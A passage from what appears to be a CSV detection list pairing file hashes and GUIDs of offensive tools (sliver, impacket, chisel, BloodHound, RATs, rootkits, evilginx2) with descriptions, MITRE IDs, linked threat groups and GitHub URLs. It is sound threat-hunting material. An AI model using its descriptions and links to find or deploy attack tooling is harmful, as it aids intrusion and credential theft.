fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21064" "*05a14a7d41f84d5169b1bf7375c19f58543c78cc4e97215fbfbe46f45acdc3bd*",".{0,1000}05a14a7d41f84d5169b1bf7375c19f58543c78cc4e97215fbfbe46f45acdc3bd.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21066" "*05acf5d2a8e06af036dc6e434e540814a8632c7a81601f912092f8b2f12c6ed3*",".{0,1000}05acf5d2a8e06af036dc6e434e540814a8632c7a81601f912092f8b2f12c6ed3.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","21068" "*05B4EB7F-3D59-4E6A-A7BC-7C1241578CA7*",".{0,1000}05B4EB7F\-3D59\-4E6A\-A7BC\-7C1241578CA7.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. 
protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","#GUIDproject","N/A","N/A","9","899","186","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z","21069" "*05bce540784886cd80d5eb0da569bc6668dfbc910fb07c2e2742b7d009f6c61f*",".{0,1000}05bce540784886cd80d5eb0da569bc6668dfbc910fb07c2e2742b7d009f6c61f.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","21070" "*05bdafc5a389b57dab75449e8932ad17eb9871d2767263e6d0576568319974d8*",".{0,1000}05bdafc5a389b57dab75449e8932ad17eb9871d2767263e6d0576568319974d8.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","21071" 
"*05C00EED2E07D2BB64FFC34AA3BA0A8D9F0DE71909ABA35706A074F23285F83B*",".{0,1000}05C00EED2E07D2BB64FFC34AA3BA0A8D9F0DE71909ABA35706A074F23285F83B.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","21072" "*05c10f59c21e200d25112a44581eab14d4793bfdc4f4cad8a9e6b0d231f4f1aa*",".{0,1000}05c10f59c21e200d25112a44581eab14d4793bfdc4f4cad8a9e6b0d231f4f1aa.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","21073" "*05cd2e1560111addd338faab64138b642f8ec40f344fe62f32f2cb762c94bcc3*",".{0,1000}05cd2e1560111addd338faab64138b642f8ec40f344fe62f32f2cb762c94bcc3.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21074" "*05d4a816e74b958db190f12fea1d3eed7abfd964261d08c1d4fc4c8a07025519*",".{0,1000}05d4a816e74b958db190f12fea1d3eed7abfd964261d08c1d4fc4c8a07025519.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","21076" "*05dbe6775382b2e504716c2d1e1631eee298950cf4503072599d92cf07746190*",".{0,1000}05dbe6775382b2e504716c2d1e1631eee298950cf4503072599d92cf07746190.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","21079" "*05dd50b46ccb4f52cd5c44cdf5387de164753bbc9f4d6adae943a3077c7c1a55*",".{0,1000}05dd50b46ccb4f52cd5c44cdf5387de164753bbc9f4d6adae943a3077c7c1a55.{0,1000}","offensive_tool_keyword","burp-log4shell","Log4Shell scanner for Burp Suite","T1190 - T1059.008 - T1071.001","TA0001 - TA0002 - TA0011","N/A","Dispossessor","Exploitation tool","https://github.com/silentsignal/burp-log4shell","1","0","#filehash","N/A","8","5","484","72","2023-09-24T08:29:56Z","2021-12-12T14:52:49Z","21080" "*05e4989bc256f214bcefda8e830675356a7aae0944fe114c7c4823c51f7cf2f2*",".{0,1000}05e4989bc256f214bcefda8e830675356a7aae0944fe114c7c4823c51f7cf2f2.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","21082" 
"*05f4184029b94e304fcef2f2c6875c1fb2a226f0d94fce013643727b10b169a5*",".{0,1000}05f4184029b94e304fcef2f2c6875c1fb2a226f0d94fce013643727b10b169a5.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","#filehash","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","21083" "*05f5eabab4a5f65f2bb08d967d6af41247465af213f1c874ad0e059c0a3ebedc*",".{0,1000}05f5eabab4a5f65f2bb08d967d6af41247465af213f1c874ad0e059c0a3ebedc.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","21084" "*05f91a311b1c92776945a93cc3d8774f586d9d217f0f5e11ac54c351a50e7dc3*",".{0,1000}05f91a311b1c92776945a93cc3d8774f586d9d217f0f5e11ac54c351a50e7dc3.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21085" "*05f9e54b0f6e0e143de11f98094e43643acaf17e01e0f7387388dc6d91681322*",".{0,1000}05f9e54b0f6e0e143de11f98094e43643acaf17e01e0f7387388dc6d91681322.{0,1000}","offensive_tool_keyword","shellsilo","cutting-edge tool that translates C syntax into syscall assembly and its corresponding shellcode","T1500 - T1588.002 - T1587.001 - T1546.015","TA0005 - TA0042","N/A","N/A","Resource 
Development","https://github.com/nixpal/shellsilo","1","0","#filehash","N/A","6","2","132","13","2024-11-08T03:16:57Z","2024-03-08T02:04:04Z","21086" "*05fb17382f049ded33be4d8d624a2b3cc246ab0814e44f07352c12e1880079b6*",".{0,1000}05fb17382f049ded33be4d8d624a2b3cc246ab0814e44f07352c12e1880079b6.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","21087" "*05fd2d9fd3a8ebed7848e8acc758d0c7964b6d3c85ce81cdbbe93d679fe1acac*",".{0,1000}05fd2d9fd3a8ebed7848e8acc758d0c7964b6d3c85ce81cdbbe93d679fe1acac.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21088" "*05fe66796ef2ccd1e425281d7b042a531891f5914281e22eabbf283635b6d6e9*",".{0,1000}05fe66796ef2ccd1e425281d7b042a531891f5914281e22eabbf283635b6d6e9.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - 
TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","21089" "*0604bfcb72cf0604f64b66202027bf2cb5eca29ffa6cbf5fb1fe8646bd1551ef*",".{0,1000}0604bfcb72cf0604f64b66202027bf2cb5eca29ffa6cbf5fb1fe8646bd1551ef.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","21091" "*061425625f0c923443e3329439f21d03796f26b41c1b0e3628a2ea564ff733e8*",".{0,1000}061425625f0c923443e3329439f21d03796f26b41c1b0e3628a2ea564ff733e8.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","0","#filehash","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","21093" "*0614ec0ae3a38dd774d2e03dfeb05bad8e2c573f1943ab951c6129825bde4df8*",".{0,1000}0614ec0ae3a38dd774d2e03dfeb05bad8e2c573f1943ab951c6129825bde4df8.{0,1000}","offensive_tool_keyword","NativeBypassCredGuard","Bypass Credential Guard by patching WDigest.dll using only NTAPI functions","T1558 - T1003.006","TA0006 - TA0005","N/A","N/A","Defense Evasion","https://github.com/ricardojoserf/NativeBypassCredGuard","1","0","#filehash","N/A","7","3","236","28","2025-04-08T18:58:37Z","2024-12-01T16:58:03Z","21094" "*061d593aaf747fa8db9674c17bc8d2baa9459b825a196f457b006ff00d4be696*",".{0,1000}061d593aaf747fa8db9674c17bc8d2baa9459b825a196f457b006ff00d4be696.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21095" "*061f3dad40a1f13fc95fd287fc07408375eab69be817d75251e2619fabbd11cc*",".{0,1000}061f3dad40a1f13fc95fd287fc07408375eab69be817d75251e2619fabbd11cc.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","21096" "*062c58fd40ba2db0ca413999598afee2beabf79f16ca0308c0565e19614d8487*",".{0,1000}062c58fd40ba2db0ca413999598afee2beabf79f16ca0308c0565e19614d8487.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","0","#filehash","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","21097" "*0635410e9971416cf572e7103ae2b61cf5f51540f6fed034e8be7ae331b68df0*",".{0,1000}0635410e9971416cf572e7103ae2b61cf5f51540f6fed034e8be7ae331b68df0.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing 
LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","21098" "*063bc732edb5ca68d2122d0311ddb46dd38ff05074945566d1fa067c3579d767*",".{0,1000}063bc732edb5ca68d2122d0311ddb46dd38ff05074945566d1fa067c3579d767.{0,1000}","offensive_tool_keyword","BadPotato","Windows Privilege Escalation Exploit BadPotato","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","Earth Lusca","Privilege Escalation","https://github.com/BeichenDream/BadPotato","1","0","#filehash","N/A","10","9","836","136","2020-05-10T15:42:21Z","2020-05-10T10:01:20Z","21099" "*063e8e1b8a6994c10bab6ccc8472674dac510c2417864904970a5d9e5626b030*",".{0,1000}063e8e1b8a6994c10bab6ccc8472674dac510c2417864904970a5d9e5626b030.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","21100" "*064d0c20e561c1208898028b84dcebf37861b15f33c0a4828ea14ee055ba3f98*",".{0,1000}064d0c20e561c1208898028b84dcebf37861b15f33c0a4828ea14ee055ba3f98.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21101" "*06500a1a2f152b59ceeb662d7bd5bb07175bf45a9c2528b2f6de58394ada4bc5*",".{0,1000}06500a1a2f152b59ceeb662d7bd5bb07175bf45a9c2528b2f6de58394ada4bc5.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","21102" "*06541ed5fb95052dfeda2cc6165732d1c125f9b49ed400f578750b03a67c418f*",".{0,1000}06541ed5fb95052dfeda2cc6165732d1c125f9b49ed400f578750b03a67c418f.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","21103" "*065c05950f37c55ceff48bc70d2733424e7e92687faefc803719ff22a5e0156f*",".{0,1000}065c05950f37c55ceff48bc70d2733424e7e92687faefc803719ff22a5e0156f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21105" "*065ce1ffbfb667546cfae3abfb257ebe7d37e03627b4ad1acd5c46543a45efca*",".{0,1000}065ce1ffbfb667546cfae3abfb257ebe7d37e03627b4ad1acd5c46543a45efca.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21106" "*065d34b6e01e8b1f150971ba0a3c565372ea2af62314e18215f062ffa2625335*",".{0,1000}065d34b6e01e8b1f150971ba0a3c565372ea2af62314e18215f062ffa2625335.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - 
TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","21107" "*0674724cfc3997eacbac08e11b5b416a818b1dab5c6be50861babdbf84c376ad*",".{0,1000}0674724cfc3997eacbac08e11b5b416a818b1dab5c6be50861babdbf84c376ad.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","21109" "*0675558d182096b75d100d91c77c1119d229c315f12bb86e353e49894b9e1d62*",".{0,1000}0675558d182096b75d100d91c77c1119d229c315f12bb86e353e49894b9e1d62.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","1","N/A","N/A","N/A","N/A","21110" "*068accaf38e4552f7b761845066b901afca8590c1bdcb66d639d52541a20a79c*",".{0,1000}068accaf38e4552f7b761845066b901afca8590c1bdcb66d639d52541a20a79c.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","#filehash","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","21117" "*0699ec05b54bc85473e88e53a615a630ca97c68bc8a96e126c1168245b0a74b6*",".{0,1000}0699ec05b54bc85473e88e53a615a630ca97c68bc8a96e126c1168245b0a74b6.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100 - T1027","TA0005 - TA0009 - TA0011 
","N/A","N/A","Data Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","0","#filehash","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","21118" "*069a9a0aece20ae241fe75e4ba6e1338f8292bf9510182883f649a32fe27604c*",".{0,1000}069a9a0aece20ae241fe75e4ba6e1338f8292bf9510182883f649a32fe27604c.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","#filehash","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","21120" "*06a0846262867cf39dcbd90d3be0d19470692f828cd24b9ed7c4b13dae8e02c5*",".{0,1000}06a0846262867cf39dcbd90d3be0d19470692f828cd24b9ed7c4b13dae8e02c5.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","0","#filehash","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","21121" "*06a4364e32aacbd0d0385b51fd849a72cd52e99964610c6a108ab2ac07603342*",".{0,1000}06a4364e32aacbd0d0385b51fd849a72cd52e99964610c6a108ab2ac07603342.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","21122" "*06a53f84d7e034e563a8fc3747000bcdc6b9945efd0ecbc990322ff527b3ad04*",".{0,1000}06a53f84d7e034e563a8fc3747000bcdc6b9945efd0ecbc990322ff527b3ad04.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced 
container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","21123" "*06a73e3d9717d7eb479c272ec005cef62ceb617735d4551fdaeab8a695abd7a5*",".{0,1000}06a73e3d9717d7eb479c272ec005cef62ceb617735d4551fdaeab8a695abd7a5.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","21124" "*06a80d02597302885c6a7ed373187e751e82878f71826962e0c09e74647326d5*",".{0,1000}06a80d02597302885c6a7ed373187e751e82878f71826962e0c09e74647326d5.{0,1000}","offensive_tool_keyword","ChaiLdr","Indirect syscalls AV bypass","T1055.011 - T1569 - T1564 - T1213","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Cipher7/ChaiLdr","1","0","#filehash","N/A","9","3","220","35","2024-05-17T13:58:04Z","2024-03-29T09:19:10Z","21125" "*06adfb5d349e0f02863abefa92b0ab3e605375651ea355581b97b864a2248110*",".{0,1000}06adfb5d349e0f02863abefa92b0ab3e605375651ea355581b97b864a2248110.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","21126" "*06AF1D64-F2FC-4767-8794-7313C7BB0A40*",".{0,1000}06AF1D64\-F2FC\-4767\-8794\-7313C7BB0A40.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - 
